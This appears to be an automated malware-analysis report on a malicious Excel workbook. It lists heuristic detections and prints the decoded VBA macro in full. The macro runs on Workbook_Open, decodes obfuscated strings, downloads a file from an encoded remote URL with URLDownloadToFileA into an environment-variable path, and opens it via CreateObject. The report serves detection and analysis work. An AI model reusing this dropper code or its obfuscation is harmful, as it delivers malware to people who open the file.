MALICIOUS
276
Risk Score
Heuristics 8
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal xgCsnmak0UOdotTKFJh As Long, ByVal z1Yw7ovMtSoJY As String, ByVal VDRnnOVNG36e As String, ByVal jNixJID0v8Fk As Long, ByVal qDrXg54JNFsRVJ3blUp As Long) As LongPtr -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set XgQM5n = CreateObject(ulQnlSI2Ai7Jm) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
XJERIsQVpyMe6b = Environ(kslOnBFbboL1T0fx2RV(thPTZ878(3145 - (2135) + (-1007)))) + kslOnBFbboL1T0fx2RV(thPTZ878(Hd0uq8("4VG~T")))
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3384 bytes |
SHA-256: 2128e85742841066aa3355827b575f8c777fa00ef88a84eef50a3df18b8acbb9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal xgCsnmak0UOdotTKFJh As Long, ByVal z1Yw7ovMtSoJY As String, ByVal VDRnnOVNG36e As String, ByVal jNixJID0v8Fk As Long, ByVal qDrXg54JNFsRVJ3blUp As Long) As LongPtr
#Else
Private Declare Function URLDownloadToFileA Lib "URLMON" (ByVal xgCsnmak0UOdotTKFJh As Long, ByVal z1Yw7ovMtSoJY As String, ByVal VDRnnOVNG36e As String, ByVal jNixJID0v8Fk As Long, ByVal qDrXg54JNFsRVJ3blUp As Long) As Long
#End If
Sub Workbook_Open()
FBGXAbRbNXi17QTN4
End Sub
Sub FBGXAbRbNXi17QTN4()
Dim VZzaayM
Dim thPTZ878
VZzaayM = Array(Hd0uq8("TUY;PEHXMxMESfJPj,c)"), Hd0uq8("S6Ph)h/3vTeq]^PlEy1DlYqPk.]okhAk9/{p^pKmpO/MUlP2xJibf^icy{[KaIJoxtZvKEid(=uo,yu)n:o(>"), Hd0uq8("3SZrO"), Hd0uq8("0x.1v"), Hd0uq8("18)nn"), Hd0uq8("0x.1v"), Hd0uq8("0x.1v"), Hd0uq8("0x.1v"))
thPTZ878 = Array(VZzaayM(-4492 - (-5937) + (-1445)), VZzaayM(Hd0uq8("18)nn")), VZzaayM(Hd0uq8("2o]W1")), VZzaayM(Hd0uq8("3SZrO")), VZzaayM(-6109 - (-2848) + (3265)), VZzaayM(3145 - (2135) + (-1007)), VZzaayM(3145 - (2135) + (-1007)), VZzaayM(3145 - (2135) + (-1007)))
Dim zuxeCLXHiXqOvKkM
Dim kslOnBFbboL1T0fx2RV
Dim XJERIsQVpyMe6b As String
kslOnBFbboL1T0fx2RV = Array(thPTZ878(-4492 - (-5937) + (-1445)), Hd0uq8("\U_.TzI6dI38oVqxngwNh07@(y<wi\ytNnCau6z~.Tn:Ce>hF^xD?Obeo^ce"), Hd0uq8("h-2WatJg`ktM[Z`pxP,V:`@Z;//`wC/0A7utgP<{su[7}hEBbLu+h1nk\*8dwzUu~aJE.Ls:<Y0oWj+{lF^iDa@.8Er]68F.V0f-c1Rz:oZ=XXmTij1/hYs@me5P|e?rKsdDWI<i5gt1aTS~-1npH1/-9nUfB/[+iAv_Il_hl>e..t*srDKl/ta[=nZmPsekFw.w+tX=szEy=h/SPkifg~gizE>h.l*``eRFPRxNk\Aepf;8"), thPTZ878(124 - (5535) + (5412)))
Dim FNLCjh3aWC
Set FNLCjh3aWC = XgQM5n(kslOnBFbboL1T0fx2RV(thPTZ878(-4225 - (-93) + (4134))))
XJERIsQVpyMe6b = Environ(kslOnBFbboL1T0fx2RV(thPTZ878(3145 - (2135) + (-1007)))) + kslOnBFbboL1T0fx2RV(thPTZ878(Hd0uq8("4VG~T")))
Call URLDownloadToFileA(thPTZ878(3145 - (2135) + (-1007)), kslOnBFbboL1T0fx2RV(-4225 - (-93) + (4134)), XJERIsQVpyMe6b, thPTZ878(3145 - (2135) + (-1007)), thPTZ878(Hd0uq8("3SZrO")))
FNLCjh3aWC.Open (XJERIsQVpyMe6b)
End Sub
Function XgQM5n(ulQnlSI2Ai7Jm) As Object
Set XgQM5n = CreateObject(ulQnlSI2Ai7Jm)
End Function
Function Hd0uq8(nu6rrJz As String) As String
Dim EXBRttElQ(14942 - (5798) + (-8089)) As Byte
Dim eJ5ukklcRgu() As Byte
Dim bPZgEltUihF2esJN5T
Dim LBxb3GHyxHx
eJ5ukklcRgu = StrConv(nu6rrJz, vbFromUnicode)
For LBxb3GHyxHx = 0 To UBound(eJ5ukklcRgu) - 1
If (LBxb3GHyxHx Mod 5 = (-2857 - (-1456) + (1401))) Then
EXBRttElQ(bPZgEltUihF2esJN5T) = eJ5ukklcRgu(LBxb3GHyxHx)
bPZgEltUihF2esJN5T = bPZgEltUihF2esJN5T + 1
End If
Next LBxb3GHyxHx
Hd0uq8 = Left(StrConv(EXBRttElQ, vbUnicode), bPZgEltUihF2esJN5T)
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.